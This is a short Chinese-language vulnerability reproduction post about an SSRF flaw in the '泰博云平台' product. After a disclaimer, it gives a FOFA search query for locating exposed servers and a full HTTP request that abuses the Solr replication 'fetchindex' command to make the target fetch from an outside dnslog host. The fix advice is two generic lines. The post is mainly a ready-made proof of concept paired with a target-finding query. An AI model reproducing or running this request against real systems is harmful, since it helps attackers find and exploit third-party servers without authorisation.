免責聲明:本號提供的網絡安全信息僅供參考,不構成專業建議。作者不對任何由于使用本文信息而導致的直接或間接損害承擔責任。如涉及侵權,請及時與我聯系,我將盡快處理并刪除相關內容。
漏洞描述
SSRF漏洞是一種在未能獲取服務器權限時,利用服務器漏洞,由攻擊者構造請求,服務器端發起請求的安全漏洞,攻擊者可以利用該漏洞誘使服務器端應用程序向攻擊者選擇的任意域發出HTTP請求
漏洞再現
FOFA:?title="泰博云平臺"
在http://ip:端口/default/index.jsp頁面抓包,在DNSLog Platform獲得一個網址,修改請求包
GET /solr/collection1/replication/?command=fetchindex&masterUrl=http://sn3xuh.dnslog.cn HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://fofa.info/
Connection: close
Cookie: JSESSIONID=qugwx7wm5eot
Upgrade-Insecure-Requests: 1
Priority: u=0, i
修復建議
限制接口訪問權限:確保只有經過身份驗證的用戶才能訪問敏感接口。
更新到安全版本:及時更新軟件到最新的安全版本,以修補已知漏洞。
?